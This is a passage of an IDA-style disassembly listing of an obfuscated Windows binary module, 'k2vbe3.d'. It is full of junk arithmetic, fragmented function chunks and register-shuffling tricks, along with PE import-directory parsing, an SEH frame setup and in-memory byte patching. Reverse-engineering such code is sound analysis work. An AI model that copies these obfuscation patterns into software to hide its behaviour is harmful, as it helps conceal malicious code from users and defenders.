; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_45887D:				; CODE XREF: sub_43CCD0+19657j
		and	edi, 81354125h
		mov	ebp, eax

loc_458885:				; CODE XREF: sub_44ED3C:loc_45631Aj
		rol	edx, 6
		add	edx, 0B46CCB4Bh
		cmp	edx, 0CE4C881Fh
		jmp	loc_44AE77
; END OF FUNCTION CHUNK	FOR sub_43CCD0

; =============== S U B	R O U T	I N E =======================================



sub_458899	proc near		; DATA XREF: sub_454BCE-1C6Ao

; FUNCTION CHUNK AT 0044E286 SIZE 0000000C BYTES

		push	edx
		call	sub_443A95
		mov	eax, 9E471775h
		call	sub_446382

loc_4588A9:				; DATA XREF: sub_45BC98-AF7Co
		xchg	esi, [esp+0]
		mov	eax, edx
		call	sub_43E135
		mov	eax, [esp+0]
		jmp	loc_44E286
sub_458899	endp

; ---------------------------------------------------------------------------

loc_4588BB:				; CODE XREF: k2vbe3.d:00458014j
		sbb	edx, 2BD94EF8h
		pushf

loc_4588C2:				; CODE XREF: k2vbe3.d:00457FFEj
		xor	eax, 0DCF04BE9h
		rol	eax, 15h
		xor	eax, 51AA104Dh
		jnz	loc_440DAF
; START	OF FUNCTION CHUNK FOR sub_440CEA

loc_4588D7:				; CODE XREF: sub_440CEA+2E1Cj
		jmp	loc_45BB06
; END OF FUNCTION CHUNK	FOR sub_440CEA
; ---------------------------------------------------------------------------
		mov	ecx, 7B03FF7Bh
		jmp	loc_452C98

; =============== S U B	R O U T	I N E =======================================



sub_4588E6	proc near		; CODE XREF: k2vbe3.d:00448169j
					; sub_4508A3-6837p

; FUNCTION CHUNK AT 0045598F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457496 SIZE 00000018 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	ecx
		cmp	ds:dword_441210, 0
		jz	loc_44E5B0
		jmp	loc_45598F
sub_4588E6	endp


; =============== S U B	R O U T	I N E =======================================



sub_4588FD	proc near		; DATA XREF: sub_454EBB-C12Ao

; FUNCTION CHUNK AT 0044D580 SIZE 00000005 BYTES

		inc	dword ptr [ebp-4]
		jmp	loc_44D580
sub_4588FD	endp


; =============== S U B	R O U T	I N E =======================================



sub_458905	proc near		; CODE XREF: sub_45299C:loc_4529ACp
		call	sub_45088F
sub_458905	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_441409

loc_45890A:				; CODE XREF: sub_441409+9D1Dj
		jmp	nullsub_20
; END OF FUNCTION CHUNK	FOR sub_441409

; =============== S U B	R O U T	I N E =======================================



sub_45890F	proc near		; DATA XREF: k2vbe3.d:00459639o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00441479 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00442CF5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449D88 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00451B84 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045229B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459B05 SIZE 0000001A BYTES

		push	38F13796h
		xchg	ebx, [esp+0]
		mov	edx, ebx
		pop	ebx
		and	edx, 34891B84h
		add	edx, 354A0AD8h
		jns	loc_449D88
sub_45890F	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_448DD4

loc_45892C:				; CODE XREF: sub_448DD4+10B04j
		jmp	loc_4590E0
; END OF FUNCTION CHUNK	FOR sub_448DD4
; ---------------------------------------------------------------------------

loc_458931:				; CODE XREF: k2vbe3.d:0044B14Aj
		jmp	loc_4584D7
; ---------------------------------------------------------------------------

loc_458936:				; CODE XREF: k2vbe3.d:00444658j
		jmp	loc_45B1F9
; ---------------------------------------------------------------------------
		jnp	loc_4493BF
		jmp	loc_45A667
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EE82

loc_458946:				; CODE XREF: sub_43EE82+5j
		jmp	ds:off_41E11C
; END OF FUNCTION CHUNK	FOR sub_43EE82
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A79B

loc_45894C:				; CODE XREF: sub_44A79B+11j
		jmp	nullsub_284
; END OF FUNCTION CHUNK	FOR sub_44A79B

; =============== S U B	R O U T	I N E =======================================



sub_458951	proc near		; CODE XREF: sub_43EE82p
					; k2vbe3.d:00454A70j ...

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 00444EDA SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044FB9E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045315C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454A75 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00458239 SIZE 00000008 BYTES

		xchg	edi, [esp+8+var_8]
		mov	edx, edi
		pop	edi
		jno	loc_454A75
		push	offset sub_44E48D
sub_458951	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_456C15

loc_458962:				; CODE XREF: sub_456C15:loc_43E546j
		jmp	loc_4518C4
; END OF FUNCTION CHUNK	FOR sub_456C15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_458967:				; CODE XREF: sub_445124+11A33j
		jnp	loc_44895E
		add	eax, 1774D05Ah
		xchg	edx, edi

loc_458975:				; CODE XREF: sub_445124:loc_451683j
		mov	[ebp-18h], eax
		mov	dword ptr [ebp-0Ch], 1

loc_45897F:				; CODE XREF: sub_454F9F:loc_43C093j
					; sub_45AAEB-C4F3j
		lea	eax, [ebp-14h]
		push	eax

loc_458983:				; CODE XREF: k2vbe3.d:00454D14j
		push	eax
		jmp	loc_44168B
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------

loc_458989:				; CODE XREF: k2vbe3.d:0043F1AFj
		ror	eax, 8
		jnz	sub_4536DC
; START	OF FUNCTION CHUNK FOR sub_448D7F

loc_458992:				; CODE XREF: sub_448D7F:loc_43F196j
		rol	edx, 12h
		add	edx, 7EDD842Dh
		mov	[edx], eax
		pop	edx
		jmp	loc_44DF3C
; END OF FUNCTION CHUNK	FOR sub_448D7F
; ---------------------------------------------------------------------------
		xchg	edi, ebp
		jmp	sub_459EE5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A9B3

loc_4589AA:				; CODE XREF: sub_45A9B3-A566j
		xor	edi, 0C1FE21E4h

loc_4589B0:				; CODE XREF: sub_45A9B3:loc_45321Aj
		call	sub_450F71

loc_4589B5:				; CODE XREF: k2vbe3.d:00450354j
		jmp	loc_450992
; END OF FUNCTION CHUNK	FOR sub_45A9B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_4589BA:				; CODE XREF: sub_446E24+1FDBj
		jmp	loc_454C78
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E9D

loc_4589BF:				; CODE XREF: sub_443E9D+6j
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_44F49C
		mov	eax, 0F75CA70h
		call	sub_4553CC
		push	ecx
		jmp	loc_43E33B
; END OF FUNCTION CHUNK	FOR sub_443E9D
; ---------------------------------------------------------------------------

loc_4589D8:				; CODE XREF: k2vbe3.d:loc_43EF98j
		mov	[esi], eax
		or	ebp, 0A0D6D9EFh
		jmp	loc_459981
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E48D

loc_4589E5:				; CODE XREF: sub_44E48D+1Aj
		add	ebx, 317D9D7Ch
		xchg	ebx, [esp+8+var_8]
		jmp	sub_443A95
; END OF FUNCTION CHUNK	FOR sub_44E48D
; ---------------------------------------------------------------------------
		adc	ebp, edi
		jmp	sub_45BB9D
; ---------------------------------------------------------------------------

loc_4589FA:				; CODE XREF: k2vbe3.d:00458B0Ej
		ror	esi, 19h

; =============== S U B	R O U T	I N E =======================================



sub_4589FD	proc near		; CODE XREF: sub_448D7F-4A7Ep

; FUNCTION CHUNK AT 00455FA9 SIZE 00000025 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	165344B8h
		pop	edx
		jmp	loc_455FA9
sub_4589FD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_458A0C:				; CODE XREF: k2vbe3.d:0043DF4Bj
		js	loc_456147
		jle	loc_44A9C0
		not	edx
		test	ebp, 0B48D3B10h
		jmp	loc_457297
; ---------------------------------------------------------------------------

loc_458A25:				; DATA XREF: sub_44C990+6D3Bo
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp]
		call	sub_4599AA
		push	108AD5F0h
		jmp	loc_4422E2
; ---------------------------------------------------------------------------

loc_458A3A:				; CODE XREF: k2vbe3.d:loc_440063j
		sub	eax, 805D720h
		add	eax, 8D6B0D59h

loc_458A46:				; CODE XREF: k2vbe3.d:loc_45980Aj
		xchg	eax, [esp]
		jmp	loc_45689B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_458A4E:				; CODE XREF: k2vbe3.d:loc_4463A0j
					; sub_44F96B+5j
		pop	ecx
		xchg	eax, [esp+0]
		mov	ecx, eax
		pop	eax
		xchg	ebx, [esp-4+arg_0]
		mov	ebp, ebx
		pop	ebx
		jmp	nullsub_400
; END OF FUNCTION CHUNK	FOR sub_457DCA

; =============== S U B	R O U T	I N E =======================================



sub_458A60	proc near		; CODE XREF: k2vbe3.d:004562A3p
					; k2vbe3.d:0045A0F2j

; FUNCTION CHUNK AT 004511BC SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045B16D SIZE 0000000B BYTES

		xchg	edi, [esp+0]
		pop	edi
		or	edx, edx
		jnz	loc_44BCA0
		jmp	loc_45B16D
sub_458A60	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_287. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_458A72:				; CODE XREF: sub_43F7AC+16j
		push	0F199A23Fh
		pop	edx
		add	edx, 4EC5F17Fh
		or	edx, 0D56D04D8h
		jmp	loc_45B358
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
		mov	eax, [ebp-1Ch]
		push	2361CA10h
		pop	edx
		add	edx, 1C2260B5h
		xor	edx, 0CBAAC4C9h
		add	edx, 959954EEh

loc_458AA4:				; CODE XREF: k2vbe3.d:00440385j
		and	edx, 0EAF8DE72h
		jmp	loc_45A01F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4505F8

loc_458AAF:				; CODE XREF: sub_4505F8+1j
		mov	ebx, ebp
		xchg	ebx, [esp+4+var_4]
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		jmp	loc_43D080
; END OF FUNCTION CHUNK	FOR sub_4505F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4508C5

loc_458ABE:				; CODE XREF: sub_4508C5+2BCDj
		jz	loc_44B6A8

loc_458AC4:				; CODE XREF: sub_4545C4-2235j
		jmp	sub_4545C4
; END OF FUNCTION CHUNK	FOR sub_4508C5
; ---------------------------------------------------------------------------

loc_458AC9:				; CODE XREF: k2vbe3.d:00450D92j
		jmp	loc_447C1F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BB4B

loc_458ACE:				; CODE XREF: sub_44BB4B+Aj
		jmp	loc_44ADC4
; END OF FUNCTION CHUNK	FOR sub_44BB4B
; ---------------------------------------------------------------------------
		push	604F7D44h
		mov	edi, ebp
		jmp	loc_44B6A4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_425. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_246. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B4EE

loc_458AE1:				; CODE XREF: sub_45B4EE-3E7Bj
		jmp	loc_43DA47
; END OF FUNCTION CHUNK	FOR sub_45B4EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449067

loc_458AE6:				; CODE XREF: sub_449067+6350j
		jmp	loc_44F665
; END OF FUNCTION CHUNK	FOR sub_449067
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AA0B

loc_458AEB:				; CODE XREF: sub_45AA0B-FB0Aj
		jmp	loc_449A64
; END OF FUNCTION CHUNK	FOR sub_45AA0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A39

loc_458AF0:				; CODE XREF: sub_451A39:loc_447400j
		add	eax, 8FC47BDDh
		call	sub_4553CC
		mov	ds:off_41E16C, eax
		lea	eax, sub_445FE0
		jmp	loc_45BAAB
; END OF FUNCTION CHUNK	FOR sub_451A39
; ---------------------------------------------------------------------------
		mov	edx, [eax]
		jmp	loc_4589FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_458B13:				; CODE XREF: sub_44469A+110EBj
		and	ecx, 7
		mov	al, 1
		shl	al, cl
		mov	edx, [ebp+var_18]
		shr	edx, 3
		push	539E16A0h
		jmp	loc_453C86
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_458B2A:				; CODE XREF: sub_45AD42:loc_4515A9j
		add	esp, 8
		call	sub_442675
; END OF FUNCTION CHUNK	FOR sub_45AD42
; START	OF FUNCTION CHUNK FOR sub_4544C3

loc_458B32:				; CODE XREF: sub_456541:loc_44F7D6j
					; sub_4544C3-33B1j
		jmp	loc_43CAF3
; END OF FUNCTION CHUNK	FOR sub_4544C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_458B37:				; CODE XREF: sub_456666-19280j
		jmp	loc_456685
; END OF FUNCTION CHUNK	FOR sub_456666

; =============== S U B	R O U T	I N E =======================================



sub_458B3C	proc near		; CODE XREF: k2vbe3.d:0044412Aj
					; sub_4572F6+7p
		xchg	ebx, [esp+0]
		pop	ebx
		push	eax
		push	offset loc_441A1C
		jmp	nullsub_292
sub_458B3C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_458B4B:				; CODE XREF: sub_43F7AC:loc_4570D8j
		mov	eax, 0CE6B079Ah
		push	esi
		push	0EB8FE6DFh
		pop	esi
		jmp	loc_450136
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------

loc_458B5C:				; CODE XREF: k2vbe3.d:loc_4473DBj
		pop	esi
		and	esi, 0D19DC876h
		js	loc_4444C9
; START	OF FUNCTION CHUNK FOR sub_44D345

loc_458B69:				; CODE XREF: sub_44D345+12j
		jmp	loc_45A1E0
; END OF FUNCTION CHUNK	FOR sub_44D345
; ---------------------------------------------------------------------------
		shr	esi, 19h
		xor	edi, esi
		mov	[edx], ecx
		jmp	loc_4444C9
; ---------------------------------------------------------------------------

loc_458B7A:				; DATA XREF: sub_448D3Ao
		jnz	loc_45B05F
		push	ebp
		mov	ebp, esp
		push	ecx
		jmp	loc_4428BB

; =============== S U B	R O U T	I N E =======================================



sub_458B89	proc near		; CODE XREF: k2vbe3.d:0044AB4Ej
					; sub_44316D:loc_45794Fp

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		add	edi, 0EB27DC1Dh
		xchg	edi, [esp-4+arg_0]
		jmp	sub_45B20A
sub_458B89	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_458B9B	proc near		; DATA XREF: k2vbe3.d:00441E0Co

; FUNCTION CHUNK AT 0043DA62 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00441219 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448F5D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AAE5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045610D SIZE 0000000D BYTES

		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_448F5D
sub_458B9B	endp


; =============== S U B	R O U T	I N E =======================================



sub_458BA9	proc near		; CODE XREF: sub_454A93+9p
					; k2vbe3.d:004582B6j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00440F71 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00449DD5 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044DB0E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457048 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458BB5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045A4F2 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	byte ptr [eax],	0C3h
		jmp	loc_457048
sub_458BA9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458BA9

loc_458BB5:				; CODE XREF: sub_458BA9:loc_457048j
		xchg	ebx, [esp-4+arg_0]
		mov	edx, ebx
		jmp	loc_44DB0E
; END OF FUNCTION CHUNK	FOR sub_458BA9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458DAF

loc_458BBF:				; CODE XREF: sub_458DAF:loc_446953j
					; sub_458DAF-5A9Aj
		push	63F3D5ADh
		pop	eax
		add	eax, 0EB27EA98h
		xor	eax, 4CBE93E6h
		cmp	eax, 4693E2FAh
		jmp	loc_45AEC4
; END OF FUNCTION CHUNK	FOR sub_458DAF
; ---------------------------------------------------------------------------
dword_458BDC	dd 0			; DATA XREF: sub_45A323:loc_44E4C2w
					; sub_442F64+BCC0r
dword_458BE0	dd 0			; DATA XREF: sub_4469E1-A92Br
					; sub_43CD01:loc_44395Bw
dword_458BE4	dd 0			; DATA XREF: sub_4468FE+110B4w
; ---------------------------------------------------------------------------

loc_458BE8:				; CODE XREF: k2vbe3.d:00452D2Cj
		jmp	loc_453200
; ---------------------------------------------------------------------------
		db 5Ch,	0E9h, 46h
dword_458BF0	dd 0			; DATA XREF: sub_43E282+391Br
; ---------------------------------------------------------------------------

loc_458BF4:				; CODE XREF: k2vbe3.d:00457A97j
		jmp	locret_456A59
; ---------------------------------------------------------------------------
		db 56h,	51h, 7Bh
dword_458BFC	dd 0			; DATA XREF: sub_4424CF-32D8r
					; sub_4462B1+7C80w
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_458C00:				; CODE XREF: sub_44B979+3469j
		jmp	nullsub_293
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------

loc_458C05:				; CODE XREF: k2vbe3.d:loc_45A31Ej
		and	ebx, 0AF8587D6h
		sub	ebx, 851AF4Ch
		add	ebx, 7914D2F0h
		mov	[ebx], eax
		pop	ebx

loc_458C1A:				; CODE XREF: k2vbe3.d:0044C2CFj
		lea	eax, [ebp-14h]
		xor	edx, edx
		jmp	loc_45662D
; ---------------------------------------------------------------------------

loc_458C24:				; CODE XREF: k2vbe3.d:loc_458170j
					; DATA XREF: sub_45814Do
		push	large dword ptr	fs:0
		mov	large fs:0, esp
		call	sub_44309C
		call	sub_43FB9B
		mov	edx, [ebx+3Ch]
		mov	edx, [ebx+edx+80h]
		or	edx, edx
		jz	loc_445424
		jmp	loc_4430D9
; ---------------------------------------------------------------------------
		or	eax, 0E194EBCBh

loc_458C59:				; CODE XREF: k2vbe3.d:00441540j
		add	eax, 9A265F6h
; START	OF FUNCTION CHUNK FOR sub_442C22

loc_458C5F:				; CODE XREF: sub_442C22+5E71j
		xchg	eax, [esp+0]

loc_458C62:				; CODE XREF: k2vbe3.d:0045B569j
		jmp	nullsub_467
; END OF FUNCTION CHUNK	FOR sub_442C22
; ---------------------------------------------------------------------------

loc_458C67:				; DATA XREF: sub_44B979:loc_44EDDDo
		xor	ebx, 2E3F663Bh
		popf
		add	eax, ebx
		pop	ebx
		xor	eax, 1DD83584h
		ror	eax, 19h
		xor	eax, 0C479950Ch
		mov	edx, [esp]
		jmp	loc_447C5C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_458C88:				; CODE XREF: sub_45A323-EBBBj
		not	ebp
		add	ecx, 0EC50DAC7h
		jmp	loc_43DAAB
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447BE9

loc_458C95:				; CODE XREF: sub_447BE9-40AEj
		sub	al, 99h
		push	7AB62292h
		pop	edx

loc_458C9D:				; CODE XREF: sub_442C22:loc_43EA43j
		rol	edx, 1Ch
		xor	edx, 0E69DEF46h
		jmp	loc_45420F
; END OF FUNCTION CHUNK	FOR sub_447BE9
; ---------------------------------------------------------------------------
		sbb	ebx, 342027AEh
		jmp	sub_45064D
; ---------------------------------------------------------------------------

loc_458CB6:				; CODE XREF: k2vbe3.d:loc_44CB4Cj
		add	ebx, ecx
		cmp	edx, 0BB9B8D00h
		push	ecx
		xchg	ecx, [esp]
		jmp	loc_4411D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F364

loc_458CC7:				; CODE XREF: sub_43F364:loc_449511j
		jz	loc_450F4D

loc_458CCD:				; CODE XREF: sub_458046+11j
		jmp	nullsub_294
; END OF FUNCTION CHUNK	FOR sub_43F364
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450CBF

loc_458CD2:				; CODE XREF: sub_450CBF-656Cj
		jmp	nullsub_295
; END OF FUNCTION CHUNK	FOR sub_450CBF
; ---------------------------------------------------------------------------
		adc	ecx, ebx
		jmp	loc_450F47
; ---------------------------------------------------------------------------

loc_458CDE:				; DATA XREF: sub_44F570+1o
		mov	ebp, esp
		add	esp, 0FFFFFD38h
		lea	eax, [ebp-0Ch]
		push	eax
		mov	eax, [ebp+8]
		call	sub_442556

loc_458CF2:				; CODE XREF: k2vbe3.d:0045385Ej
		jmp	loc_449BB6
; ---------------------------------------------------------------------------

loc_458CF7:				; CODE XREF: k2vbe3.d:0043C9E4j
		jmp	sub_441409
; ---------------------------------------------------------------------------

loc_458CFC:				; CODE XREF: k2vbe3.d:00441578j
		mov	[esi], edi
		sub	edx, eax
		ror	ebp, 8
; START	OF FUNCTION CHUNK FOR sub_442C22

loc_458D03:				; CODE XREF: sub_442C22:loc_44156Cj
		sub	eax, 735A582Dh
		rol	eax, 1
		test	eax, 800h
		jmp	loc_45477B
; END OF FUNCTION CHUNK	FOR sub_442C22
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EF6

loc_458D16:				; CODE XREF: sub_443EF6:loc_459F9Cj
		jnz	loc_447BA8

loc_458D1C:				; CODE XREF: k2vbe3.d:0044E707j
		jmp	nullsub_359
; END OF FUNCTION CHUNK	FOR sub_443EF6
; ---------------------------------------------------------------------------
		xor	edi, 0A29F2E0Ch
		push	ebp
		pop	ebx
		jmp	loc_43C4A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_458D2E:				; CODE XREF: sub_43C865:loc_455AE0j
		jz	loc_44503A
		jmp	loc_447829
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------
		mov	eax, [ecx]
		jmp	sub_443B55
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BE94

loc_458D40:				; CODE XREF: sub_45BE94-16EFAj
		mov	edx, eax
		pop	eax
		pop	eax
		mov	ds:dword_44BA84, edx
		jmp	loc_450315
; END OF FUNCTION CHUNK	FOR sub_45BE94

; =============== S U B	R O U T	I N E =======================================



sub_458D4F	proc near		; CODE XREF: k2vbe3.d:004435C3j
					; sub_4529E2:loc_448485j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00447C66 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00456903 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045BE12 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	ebp, [esp+0]
		mov	edx, ebp
		pop	ebp
		jmp	loc_447C66
sub_458D4F	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_260. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_458D5F:				; CODE XREF: sub_44BDBB+8CD3j
		jmp	loc_4505A5
; END OF FUNCTION CHUNK	FOR sub_44BDBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459A60

loc_458D64:				; CODE XREF: sub_459A60-14C5Dj
					; sub_459A60:loc_454D4Cj
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_457798
		jmp	loc_45B110
; END OF FUNCTION CHUNK	FOR sub_459A60
; ---------------------------------------------------------------------------

loc_458D75:				; CODE XREF: k2vbe3.d:00445295j
		test	ebx, 0F3BEF8D5h
		jmp	loc_44E113

; =============== S U B	R O U T	I N E =======================================



sub_458D80	proc near		; CODE XREF: k2vbe3.d:00448E2Cj
					; k2vbe3.d:0044CFEEp

; FUNCTION CHUNK AT 0045300F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456BB9 SIZE 00000006 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	79F15C9Dh
		pop	ebx
		and	ebx, 0F89FC2F3h
		cmp	ebx, 24B1280Ch
		jmp	loc_45300F
sub_458D80	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		sbb	esi, ecx
		xor	ebx, eax
		jmp	sub_43FCA0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_458DA4:				; CODE XREF: sub_4529E2:loc_4599CAj
		jz	loc_43C15E
		jmp	loc_448485
; END OF FUNCTION CHUNK	FOR sub_4529E2

; =============== S U B	R O U T	I N E =======================================



sub_458DAF	proc near		; DATA XREF: sub_459A53+3o

; FUNCTION CHUNK AT 0044143A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004445DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446953 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B1CE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453312 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00453B34 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045467D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00458BBF SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045AEC4 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045BD33 SIZE 00000005 BYTES

		mov	eax, 12h
		call	sub_44662B
		test	al, al
		jz	loc_44241E
		jmp	loc_446953
sub_458DAF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442475

loc_458DC6:				; CODE XREF: sub_442475:loc_445481j
		mov	edx, eax
		xchg	edx, [esp+0]
		call	sub_448D3A
		or	eax, eax
		jnz	loc_45A20E
		jmp	loc_447F49
; END OF FUNCTION CHUNK	FOR sub_442475
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4523BE

loc_458DDD:				; CODE XREF: sub_4523BE+3448j
		mov	edx, [esp+0]
		push	edx
		mov	edx, eax
		xchg	edx, [esp+4+var_4]
		mov	eax, edx
		call	sub_44367E
		jmp	loc_440A12
; END OF FUNCTION CHUNK	FOR sub_4523BE
; ---------------------------------------------------------------------------
		popf
		jmp	sub_455A4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A1B1

loc_458DF8:				; CODE XREF: k2vbe3.d:0043D763j
					; k2vbe3.d:0043D779j ...
		js	loc_4564AB
		mov	eax, [ebp+8]
		test	byte ptr [eax-10h], 38h
		jnz	loc_441C00
		mov	eax, [ebp+8]
		jmp	loc_456E2F
; END OF FUNCTION CHUNK	FOR sub_44A1B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45530F

loc_458E13:				; CODE XREF: sub_45530F-69A3j
		call	sub_451A39

loc_458E18:				; CODE XREF: k2vbe3.d:0043D1C3j
		jmp	loc_43E5AE
; END OF FUNCTION CHUNK	FOR sub_45530F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_458E1D:				; CODE XREF: sub_44C90E:loc_44A087j
		jz	loc_4454CB
		jmp	loc_44E67F
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_458E28:				; DATA XREF: sub_43FE2A+31C0o
		cmp	eax, 0FFFFFFFFh
		jz	loc_4475B4
		mov	eax, [eax]
		jmp	loc_446F05
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE2A

loc_458E38:				; CODE XREF: sub_43FE2A:loc_442FDCj
		call	sub_448C1A
		sbb	ebp, 0FF626385h

loc_458E43:				; CODE XREF: sub_44B870-8D33j
					; k2vbe3.d:loc_45460Bj
		jmp	loc_440219
; END OF FUNCTION CHUNK	FOR sub_43FE2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45744C

loc_458E48:				; CODE XREF: sub_45744C:loc_44F3E2j
		pop	edx
		pop	ebx
		pop	eax

loc_458E4B:				; CODE XREF: sub_43CF62:loc_45B42Bj
		pop	ebp
		jmp	loc_44C394
; END OF FUNCTION CHUNK	FOR sub_45744C
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp]
		jmp	loc_44A39D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454EDD

loc_458E5C:				; CODE XREF: sub_454EDD-8E5Fj
		cmp	ecx, edi
